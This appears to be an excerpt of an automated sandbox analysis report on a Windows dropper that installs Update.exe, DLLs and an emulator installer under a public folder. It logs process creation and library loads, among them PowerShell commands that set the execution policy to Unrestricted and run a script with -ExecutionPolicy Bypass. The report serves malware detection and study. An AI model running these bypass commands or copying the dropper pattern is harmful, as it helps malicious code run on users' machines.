                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreakJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq Update.exe" Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "Update.exe" Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreakJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq Update.exe" Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "Update.exe" Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreakJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq Update.exe" Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "Update.exe" Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreakJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1Jump to behavior
                      Source: C:\Users\user\Desktop\Uulw5M1DfU.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Uulw5M1DfU.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\Uulw5M1DfU.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\Uulw5M1DfU.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Uulw5M1DfU.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Uulw5M1DfU.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\Uulw5M1DfU.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\Uulw5M1DfU.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\Uulw5M1DfU.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\Uulw5M1DfU.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\Uulw5M1DfU.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\Uulw5M1DfU.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\Uulw5M1DfU.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\Uulw5M1DfU.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\Uulw5M1DfU.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\Uulw5M1DfU.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\Uulw5M1DfU.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\Uulw5M1DfU.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Uulw5M1DfU.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\Uulw5M1DfU.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Uulw5M1DfU.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\Uulw5M1DfU.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: update.dllJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: vcruntime140.dllJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: linkinfo.dllJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: ntshrui.dllJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: cscapi.dllJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: napinsp.dllJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: pnrpnsp.dllJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: wshbth.dllJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: nlaapi.dllJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: winrnr.dllJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: dxgi.dllJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: dinput8.dllJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: inputhost.dllJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: coreuicomponents.dllJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: resourcepolicyclient.dllJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: devenum.dllJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: devobj.dllJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: msdmo.dllJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: avicap32.dllJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: msvfw32.dllJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
                      Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
                      Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
                      Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00021401-0000-0000-C000-000000000046}\InProcServer32Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq Update.exe"
                      Source: ldplayer9_ld_6000_ld.exe.lnk.3.drLNK file: ..\..\Public\Bilite\ldplayer9_ld_6000_ld.exe
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: Uulw5M1DfU.exeStatic file information: File size 67003808 > 1048576
                      Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb9 source: powershell.exe, 00000012.00000002.2573546092.0000000008838000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: H:\trunk_download\downloader_cn\downloader\bin\ldplayerinst.pdb source: Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002B87000.00000004.00000020.00020000.00000000.sdmp, ldplayer9_ld_6000_ld.exe.0.dr
                      Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000012.00000002.2573546092.0000000008838000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\Administrator\Desktop\MFCLibrary_YSS\Release\Update.pdb source: Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002AF6000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmp
                      Source: Binary string: E:\agent\workspace\p-e3cf6c00cb1d4f41832c02872427999a\src\Ufo4WinMac\GamerUFO\ufo4Desktop\Output\bin\Release\UpdateApp.pdb source: Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002AF6000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000003.00000002.3509363216.00000000006E2000.00000002.00000001.01000000.00000005.sdmp, Update.exe, 00000003.00000000.1746874301.00000000006E2000.00000002.00000001.01000000.00000005.sdmp, Update.exe.0.dr
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb_qF source: powershell.exe, 00000012.00000002.2569455874.000000000776B000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000012.00000002.2561569868.0000000002FAB000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000012.00000002.2573546092.0000000008838000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000012.00000002.2569455874.000000000776B000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: E:\agent\workspace\p-e3cf6c00cb1d4f41832c02872427999a\src\Ufo4WinMac\GamerUFO\ufo4Desktop\Output\bin\Release\UpdateApp.pdb((& source: Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002AF6000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000003.00000002.3509363216.00000000006E2000.00000002.00000001.01000000.00000005.sdmp, Update.exe, 00000003.00000000.1746874301.00000000006E2000.00000002.00000001.01000000.00000005.sdmp, Update.exe.0.dr
                      Source: Binary string: H:\trunk_download\downloader_cn\downloader\bin\ldplayerinst.pdbo source: Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002B87000.00000004.00000020.00020000.00000000.sdmp, ldplayer9_ld_6000_ld.exe.0.dr
                      Source: C:\Users\user\Desktop\Uulw5M1DfU.exeCode function: 0_2_00406D5D LoadLibraryA,GetProcAddress,GetModuleHandleW,GetWindow,GetWindow,LoadIconW,GetWindow,0_2_00406D5D
                      Source: Update.dll.0.drStatic PE information: section name: .00cfg
                      Source: backup.dll.3.drStatic PE information: section name: .00cfg
                      Source: C:\Users\user\Desktop\Uulw5M1DfU.exeCode function: 0_2_00411C20 push eax; ret 0_2_00411C4E
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_03804345 push ecx; ret 3_2_03804358
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_0381A168 push eax; ret 3_2_0381A119
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_0381A0B8 push eax; ret 3_2_0381A119
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_03812450 push ebp; retf 3_2_03812474
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_03812470 push ebp; retf 3_2_03812474
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6CA9CAF7 push ecx; ret 3_2_6CA9CB0A
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_10009DF5 push ecx; ret 3_2_10009E08
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_1001FE9A push ecx; ret 3_2_1001FEBF
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_00C7CAFF push eax; retf 3_2_00C7CB00
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_00C7CB61 pushfd ; retf 3_2_00C7CB64
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_00C7CB07 pushad ; retf 3_2_00C7CB08
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_00C7CB0B push 701000CBh; retf 3_2_00C7CB10
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_00C79DCC push ecx; ret 3_2_00C79DDF
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_03683D04 push ecx; ret 3_2_03683D17
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_07983B68 pushad ; ret 18_2_07983DB1
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeFile created: C:\Users\user\AppData\Local\Temp\backup.exeJump to dropped file
                      Source: C:\Users\user\Desktop\Uulw5M1DfU.exeFile created: C:\Users\Public\Bilite\Axialis\Update.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Uulw5M1DfU.exeFile created: C:\Users\Public\Bilite\Axialis\Update.exeJump to dropped file
                      Source: C:\Users\user\Desktop\Uulw5M1DfU.exeFile created: C:\Users\Public\Bilite\ldplayer9_ld_6000_ld.exeJump to dropped file
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeFile created: C:\Users\user\AppData\Local\Temp\backup.dllJump to dropped file

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
